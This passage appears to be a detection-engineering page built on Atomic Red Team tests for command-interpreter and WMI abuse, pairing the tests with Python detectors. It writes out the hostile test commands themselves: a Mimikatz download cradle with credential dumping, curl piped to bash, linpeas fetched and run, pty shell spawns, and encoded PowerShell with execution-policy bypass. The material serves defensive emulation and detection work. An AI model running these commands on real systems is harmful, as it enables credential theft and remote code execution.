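        script = decode_encoded_command(switches["EncodedCommand"]) or ""
    return switches, script


def analyse(cmdline):
    """Return canonical switches, the recovered script and the indicators it triggers."""
    switches, script = parse_command_line(cmdline)
    ind = []
    if "EncodedCommand" in switches:
        ind.append("encoded_command")
    if str(switches.get("ExecutionPolicy", "")).lower() == "bypass":
        ind.append("exec_policy_bypass")
    if str(switches.get("WindowStyle", "")).lower().startswith("h"):
        ind.append("hidden_window")
    if switches.get("Version") == "2":
        ind.append("downgrade_version_2")
    ind += [n for n, rx in INDICATORS.items() if rx.search(script)]
    ind += ["known_malicious_cmdlet:" + c for c in MALICIOUS_CMDLETS if c.lower() in script.lower()]
    return {"switches": switches, "script": script, "indicators": ind}


# Sample command lines copied from this page.
SAMPLE_OBFUSCATED_TEST19 = "powershell.exe -e JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA=="
SAMPLE_WMI_TEST7 = "powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA"
SAMPLE_MIMIKATZ_TEST1 = "powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\""

if __name__ == "__main__":
    for line in (SAMPLE_OBFUSCATED_TEST19, SAMPLE_WMI_TEST7, SAMPLE_MIMIKATZ_TEST1):
        r = analyse(line)
        print(r["indicators"], "|", r["script"][:80])
```

Decoding test 19's payload recovers `& (gcm ('ie{0}' -f 'x')) ("Wr"+"it"+...)`: the string-concatenation and `-f` format-operator patterns are only visible after decoding, which is the practical reason the raw command line gives "no signature".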
Host model - Command and Scripting Interpreter - AppleScript
Reference: https://github.com/EmpireProject/Empire
osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\\\" | python &\""
Host model - Command and Scripting Interpreter - Windows Command Shell
- Atomic Test #3 - Suspicious Execution via Windows Command Shell
- Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing
- Atomic Test #5 - Command Prompt read contents from CMD file and execute
1. Create and execute a batch script
Start-Process $env:TEMP\T1059.003_script.bat
2. Write text to a file and display it
echo "Hello from the Windows Command Prompt! " > "%TEMP%\test.bin" & type "%TEMP%\test.bin"
3. Suspicious execution via the Windows command line
%LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! > hello.txt & type hello.txt
4. Simulate BlackByte ransomware print bombing
cmd /c "for /l %x in (1,1,75) do start wordpad.exe /p $env:temp\T1059_003note.txt" | out-null
5. Read contents from a file at the command prompt and execute them
cmd /r cmd<PathToAtomicsFolder\T1059.003\src\t1059.003_cmd.cmd
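Test 3 above hides the interpreter name behind cmd's substring expansion (`%VAR:~start,len%`), so a keyword match on `cmd` never sees it; a detector has to expand that syntax with the same semantics cmd.exe uses first. The Python below is an added example, not code from the page or from Atomic Red Team: it implements that expansion and adds rules for the print-bombing loop of test 4 (with the iteration count recovered), the read-commands-from-stdin form of test 5 and batch files started from the temp directory (test 1). The environment values, the resolved `$env:temp` path and the benign control line are constructed; the other command lines are copied from the tests above.

```python
"""De-obfuscating and flagging Windows Command Shell command lines (T1059.003).

Added example, not part of the page or of Atomic Red Team.
"""
import re

SUBSTRING_RE = re.compile(r"%(?P<var>[A-Za-z_][A-Za-z0-9_]*):~(?P<start>-?\d+)(?:,(?P<len>-?\d+))?%")
PRINT_LOOP_RE = re.compile(r"for\s+/l\s+%\w+\s+in\s+\((-?\d+),(-?\d+),(-?\d+)\)\s+do\s+start\b.*\s/p\b", re.I)
STDIN_SCRIPT_RE = re.compile(r"\bcmd(\.exe)?\s*<\s*\S+", re.I)
TEMP_BATCH_RE = re.compile(r'(%TEMP%|\$env:TEMP|\\Temp\\)[^\s"]*\.(bat|cmd)\b', re.I)


def expand_substring(cmdline, env):
    """Expand %VAR:~start[,len]% the way cmd.exe does; unknown variables are left as written."""
    def repl(m):
        value = env.get(m.group("var").upper())
        if value is None:
            return m.group(0)
        start = int(m.group("start"))
        start = start if start >= 0 else max(len(value) + start, 0)   # negative start counts from the end
        if m.group("len") is None:
            return value[start:]
        length = int(m.group("len"))
        # A negative length means "stop that many characters before the end".
        return value[start:start + length] if length >= 0 else value[start:length]
    return SUBSTRING_RE.sub(repl, cmdline)


def analyse_cmd(cmdline, env):
    """Return the expanded command line and the indicators it triggers."""
    expanded = expand_substring(cmdline, env)
    ind = []
    if expanded != cmdline:
        ind.append("envvar_substring_obfuscation")
        if re.match(r"\s*cmd(\.exe)?\b", expanded, re.I):
            ind.append("obfuscated_interpreter_name:cmd")
    m = PRINT_LOOP_RE.search(expanded)
    if m:
        first, step, last = (int(g) for g in m.groups())
        iterations = (last - first) // step + 1 if step else 0
        ind.append("print_bombing_loop:%d" % iterations)
    if STDIN_SCRIPT_RE.search(expanded):
        ind.append("cmd_script_from_stdin")
    if TEMP_BATCH_RE.search(expanded):
        ind.append("batch_file_from_temp")
    return {"expanded": expanded, "indicators": ind}


# Constructed environment of the process being inspected.
ENV = {
    "LOCALAPPDATA": r"C:\Users\alice\AppData\Local",
    "TEMP": r"C:\Users\alice\AppData\Local\Temp",
    "COMSPEC": r"C:\Windows\System32\cmd.exe",
}
# Command lines from tests 3, 4, 5, 1 and 2 above (paths resolved; the last one is a benign control).
SAMPLE_LINES = [
    r"%LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! > hello.txt & type hello.txt",
    r'cmd /c "for /l %x in (1,1,75) do start wordpad.exe /p C:\Users\alice\AppData\Local\Temp\T1059_003note.txt"',
    r"cmd /r cmd<PathToAtomicsFolder\T1059.003\src\t1059.003_cmd.cmd",
    r"cmd.exe /c %TEMP%\T1059.003_script.bat",
    r'cmd.exe /c echo "Hello from the Windows Command Prompt! " > "%TEMP%\test.bin" & type "%TEMP%\test.bin"',
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        r = analyse_cmd(line, ENV)
        print(r["indicators"] or "-", "<=", r["expanded"][:70])
```

The expansion needs the variable values of the actual process (here `ENV`), which is why this de-obfuscation is easier to do on the endpoint, where the environment block is available, than in a central log pipeline that only sees the command-line string.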
Host model - Command and Scripting Interpreter - Bash
1. Create and execute a shell script
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
chmod +x /tmp/art.sh
sh /tmp/art.sh
2. Download a shell script from the command line and execute it through a pipe
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
3. Collect executables that have the SUID bit set
chmod +x PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
bash PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
Reference:
https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh
4. Run the LinEnum information-gathering tool
chmod +x PathToAtomicsFolder/T1059.004/src/LinEnum.sh
bash PathToAtomicsFolder/T1059.004/src/LinEnum.sh
Reference:
https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh
5. Put the script in a temporary file
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
6. Query the shell a script is executed with
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
7. Confirm which shell environments are available
cat /etc/shells
8. Fileless shell script execution
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
9. Obfuscated command-line script
ART=$(echo -n "id" |base64 -w 0)
echo "\$ART=$ART"
echo -n "$ART" |base64 -d |/bin/bash
unset ART
10. Change the login shell
useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
11. Execute a shell script via an environment variable
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/bash
12. Detect a shell fed through a pipe
cd /tmp
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
ls -la /tmp/art.txt
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh |bash
ls -la /tmp/art.txt
Host model - Command and Scripting Interpreter - Visual Basic
1. Collect local computer information with a VB script
cscript PathToAtomicsFolder\T1059.005\src\sys_info.vbs > $env:TEMP\T1059.005.out.txt
2. Encode VBS code and execute it
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
3. Extract information from memory with VBA
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
Host model - Command and Scripting Interpreter - Python
- Atomic Test #1 - Execute shell script via python's command mode argument
- Atomic Test #3 - Execute Python via Python executables (Linux)
- Atomic Test #4 - Python pty module and spawn function used to spawn sh or bash
1. Execute a shell script via Python's command-line argument mode
which_python=$(which python || which python3 || which python2)
$which_python -c 'import requests;import os;url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh";malicious_command = "sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
2. Execute Python as a .py script
which_python=$(which python || which python3 || which python2)
echo 'import requests' > T1059.006.py
echo 'import os' >> T1059.006.py
echo 'url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh"' >> T1059.006.py
echo 'malicious_command = "T1059.006-payload T1059.006.py -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles"' >> T1059.006.py
echo 'session = requests.session()' >> T1059.006.py
echo 'source = session.get(url).content' >> T1059.006.py
echo 'fd = open("T1059.006-payload", "wb+")' >> T1059.006.py
echo 'fd.write(source)' >> T1059.006.py
echo 'fd.close()' >> T1059.006.py
echo 'os.system(malicious_command)' >> T1059.006.py
$which_python T1059.006.py
3. Execute Python as a compiled (.pyc) file
which_python=$(which python || which python3 || which python2)
echo 'import requests' > T1059.006.py
echo 'import os' >> T1059.006.py
echo 'url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh"' >> T1059.006.py
echo 'malicious_command = "T1059.006-payload T1059.006.py -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles"' >> T1059.006.py
echo 'session = requests.session()' >> T1059.006.py
echo 'source = session.get(url).content' >> T1059.006.py
echo 'fd = open("T1059.006-payload", "wb+")' >> T1059.006.py
echo 'fd.write(source)' >> T1059.006.py
echo 'fd.close()' >> T1059.006.py
echo 'os.system(malicious_command)' >> T1059.006.py
$which_python -c 'import py_compile; py_compile.compile("T1059.006.py", "T1059.006.pyc")'
$which_python T1059.006.pyc
4. Use Python's pty module and spawn function to spawn bash and sh
which_python=$(which python || which python3 || which python2)
$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
$which_python -c "import pty;pty.spawn('/bin/bash')"
exit
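The Bash tests (2, 5, 9, 10, 11, 12) and the Python tests (1 to 4) above reduce to a short list of command-line shapes: a download piped into a shell, a base64 or environment-variable payload piped into a shell, a script run from /tmp, a login-shell change, the enumeration scripts, inline `python -c` payloads, `.pyc` execution and download-then-`os.system`. The Python below is an added example, not code from the page or from Atomic Red Team, serving both sections: it maps those shapes to indicators and recovers the plaintext of a base64 payload piped into a shell, as in test 9. Input is one command line as an auditd EXECVE record or shell history would show it (assumption); the samples are copied from the tests above with `$which_python` resolved to `/usr/bin/python3` and the mktemp name resolved to a constructed value, plus one constructed benign line.

```python
"""Flagging shell and Python interpreter abuse on Linux (T1059.004, T1059.006).

Added example, not part of the page or of Atomic Red Team.
"""
import base64
import binascii
import re

SHELL = r"\|\s*(/bin/)?(ba)?sh\b"      # "| bash", "|/bin/sh", ...
RULES = [  # (indicator, regex) in evaluation order
    ("pipe_to_shell", re.compile(r"\b(curl|wget)\b.*" + SHELL)),
    ("base64_to_shell", re.compile(r"base64\s+(-d|--decode)\b.*" + SHELL)),
    ("envvar_to_shell", re.compile(r"echo\s+\$\w+\s*" + SHELL)),
    ("script_in_tmp", re.compile(r"\b(ba)?sh\s+(\$TMPFILE|/tmp/\S+)")),
    ("login_shell_change", re.compile(r"\b(chsh\s+-s\s+\S+|useradd\b.*\s-s\s+/\S+)")),
    ("enum_script", re.compile(r"\b(AutoSUID|LinEnum|linpeas)\.sh\b", re.I)),
    ("python_inline_exec", re.compile(r"python[23]?(\.\d+)?\s+-c\s+.*\b(os\.system|subprocess|pty\.spawn)\b")),
    ("python_pty_spawn", re.compile(r"pty\.spawn\(")),
    ("python_pyc_exec", re.compile(r"python[23]?(\.\d+)?\s+\S+\.pyc\b")),
    ("download_then_exec", re.compile(r"requests\.(get|session)\(.*os\.system\(")),
]
B64_ECHO_RE = re.compile(r"echo\s+(?:-n\s+)?[\"']?([A-Za-z0-9+/=]+)[\"']?\s*\|\s*base64\s+(?:-d|--decode)\b")


def decode_piped_base64(cmdline):
    """Recover the plaintext of `echo <b64> | base64 -d | sh`; None if absent or undecodable."""
    m = B64_ECHO_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def analyse_shell(cmdline):
    """Return the indicators one command line triggers and, when present, its decoded base64 payload."""
    indicators = [name for name, rx in RULES if rx.search(cmdline)]
    return {"indicators": indicators, "decoded": decode_piped_base64(cmdline)}


# Sample lines from the Bash and Python tests above (last one constructed as a benign control).
SAMPLE_LINES = [
    "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash",
    "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash",
    'echo -n "aWQ=" |base64 -d |/bin/bash',             # "aWQ=" is base64 of "id", as in test 9
    "echo $ART |/bin/bash",
    "bash /tmp/tmp.Kx1abc",                             # mktemp name resolved (constructed)
    "chsh -s /bin/sh art",
    "bash PathToAtomicsFolder/T1059.004/src/LinEnum.sh",
    "/usr/bin/python3 -c \"import pty;pty.spawn('/bin/sh')\"",
    "/usr/bin/python3 T1059.006.pyc",
    "/usr/bin/python3 -c 'import requests;import os;url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\";malicious_command = \"sh T1059.006-payload -q\";session = requests.session();source = session.get(url).content;fd = open(\"T1059.006-payload\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'",
    "ls -la /tmp/art.txt",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        r = analyse_shell(line)
        print(r["indicators"] or "-", r["decoded"] or "", "<=", line[:60])
```

`pipe_to_shell` on its own is noisy on developer machines where installers are routinely fetched this way; the rules after it (base64 payloads, environment-variable payloads, a `.pyc` handed straight to the interpreter) carry far less benign traffic and are the better candidates for alerting.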
Host model - Command and Scripting Interpreter - JavaScript
- Atomic Test #1 - JScript execution to gather local computer information via cscript
- Atomic Test #2 - JScript execution to gather local computer information via wscript
1. Use cscript to run JScript that gathers local computer information
cscript PathToAtomicsFolder\T1059.007\src\sys_info.js > $env:TEMP\T1059.007.out.txt
2. Use wscript to run JScript that gathers local computer information
wscript PathToAtomicsFolder\T1059.007\src\sys_info.js
Host model - Windows Management Instrumentation (WMI)
- Atomic Test #7 - Create a Process using WMI Query and an Encoded Command
- Atomic Test #8 - Create a Process using obfuscated Win32_Process
1. User reconnaissance with WMI
wmic useraccount get /ALL /format:csv
2. Process reconnaissance with WMI
wmic process get caption,executablepath,commandline /format:csv
3. Software reconnaissance with WMI
wmic qfe get description,installedOn /format:csv
4. Service reconnaissance on a remote host with WMI
wmic /node:"127.0.0.1" service where (caption like "%Spooler%")
5. Execute a local process with WMI
wmic process call create notepad.exe
6. Execute a remote process with WMI
wmic /user:DOMAIN\Administrator /password:P@ssw0rd1 /node:"127.0.0.1" process call create notepad.exe
7. Create a process with a WMI query and an encoded command
powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
8. Create a process with an obfuscated Win32_Process
$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
$NewClass = $Class.Derive("Win32_Atomic")
$NewClass.Put()
Invoke-WmiMethod -Path Win32_Atomic -Name create -ArgumentList notepad.exe
9. Execute rundll32 with WMI
wmic /node:127.0.0.1 process call create "rundll32.exe $env:TEMP\calc.dll StartW"
10. Uninstall an application with WMIC
wmic /node:"127.0.0.1" product where "name like 'Tightvnc%%'" call uninstall
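The ten WMI tests above split into what is visible on the wmic.exe or powershell.exe command line (recon queries, `process call create`, a `/node:` target, a password on the command line, the derived-class trick of test 8 that hides `Win32_Process` behind another class name, rundll32 with a DLL in the temp directory) and what is only visible in the parent/child relation: a process started through `Win32_Process.Create` is spawned by the WMI provider host `WmiPrvSE.exe`, not by the caller, so test 8's renamed class still produces that same parent. The Python below is an added example, not code from the page or from Atomic Red Team, combining both sources over constructed process records whose command lines are copied from the tests above. The record layout, sample paths and the `WmiPrvSE.exe` child allow-list are assumptions.

```python
"""Detection rules for the WMI tests (T1047).

Added example, not part of the page or of Atomic Red Team.  Records are
constructed dicts with "image", "parent" and "cmdline" keys.
"""
import re

WMIC_RECON = re.compile(r"\bwmic(\.exe)?\b.*\b(useraccount\s+get|process\s+get|qfe\s+get|service\s+where)\b", re.I)
WMIC_CREATE = re.compile(r"\bwmic(\.exe)?\b.*\bprocess\s+call\s+create\b", re.I)
WMIC_NODE = re.compile(r'/node:"?(?P<host>[^\s"]+)', re.I)
WMIC_CREDS = re.compile(r"/password:\S+", re.I)
WMIC_UNINSTALL = re.compile(r"\bproduct\s+where\b.*\bcall\s+uninstall\b", re.I)
PS_WMI_CREATE = re.compile(r"Invoke-WmiMethod\s+-Path\s+(?P<cls>\S+)\s+-Name\s+create", re.I)
PS_DERIVE = re.compile(r"ManagementClass\b.*\.Derive\(", re.I)
RUNDLL_TEMP = re.compile(r"rundll32(\.exe)?\s+\S*(\\Temp\\|\$env:TEMP|%TEMP%)\S*\.dll\b", re.I)
WMIPRVSE_CHILD_ALLOW = {"conhost.exe"}   # constructed allow-list; tune to the environment


def evaluate(event):
    """Return the rule names one process-creation event triggers (empty list if none)."""
    cmd, image, parent = event.get("cmdline", ""), event.get("image", ""), event.get("parent", "")
    hits = []
    if WMIC_RECON.search(cmd):
        hits.append("wmic_recon")
    if WMIC_CREATE.search(cmd):
        hits.append("wmic_process_create")
    m = WMIC_NODE.search(cmd)
    if m:
        hits.append("wmic_remote_node:" + m.group("host"))
    if WMIC_CREDS.search(cmd):
        hits.append("credentials_on_cmdline")
    if WMIC_UNINSTALL.search(cmd):
        hits.append("wmic_uninstall")
    m = PS_WMI_CREATE.search(cmd)
    if m:
        cls = m.group("cls")
        hits.append("ps_wmi_process_create" if cls.lower() == "win32_process"
                    else "ps_wmi_process_create_derived_class:" + cls)
    if PS_DERIVE.search(cmd):
        hits.append("wmi_class_derived")
    if RUNDLL_TEMP.search(cmd):
        hits.append("rundll32_dll_from_temp")
    # Parent/child view: anything WmiPrvSE.exe spawns outside the allow-list came from a WMI method call.
    if parent.lower().endswith("wmiprvse.exe") and image.lower().rsplit("\\", 1)[-1] not in WMIPRVSE_CHILD_ALLOW:
        hits.append("spawned_by_wmiprvse")
    return hits


def scan(events):
    """Evaluate every event; one hit list per event, in input order."""
    return [evaluate(e) for e in events]


WMIC = r"C:\Windows\System32\wbem\wmic.exe"
CMD = r"C:\Windows\System32\cmd.exe"
# Constructed records; command lines from tests 1, 6, 8, 9 and 10 above, plus two constructed child events.
SAMPLE_EVENTS = [
    {"image": WMIC, "parent": CMD, "cmdline": "wmic useraccount get /ALL /format:csv"},
    {"image": WMIC, "parent": CMD, "cmdline": r'wmic /user:DOMAIN\Administrator /password:P@ssw0rd1 /node:"127.0.0.1" process call create notepad.exe'},
    {"image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmdline": "notepad.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": CMD,
     "cmdline": "Invoke-WmiMethod -Path Win32_Atomic -Name create -ArgumentList notepad.exe"},
    {"image": WMIC, "parent": CMD, "cmdline": r'wmic /node:127.0.0.1 process call create "rundll32.exe C:\Users\alice\AppData\Local\Temp\calc.dll StartW"'},
    {"image": WMIC, "parent": CMD, "cmdline": "wmic /node:\"127.0.0.1\" product where \"name like 'Tightvnc%%'\" call uninstall"},
    {"image": r"C:\Windows\System32\conhost.exe", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmdline": r"\??\C:\Windows\system32\conhost.exe 0x4"},
]

if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(hits or "-", "<=", event["cmdline"][:70])
```

The command-line rules and the parent/child rule are complementary: test 7's encoded command and test 8's derived class both defeat a plain `Win32_Process` keyword on the caller's command line, but neither changes the fact that the new process has `WmiPrvSE.exe` as its parent.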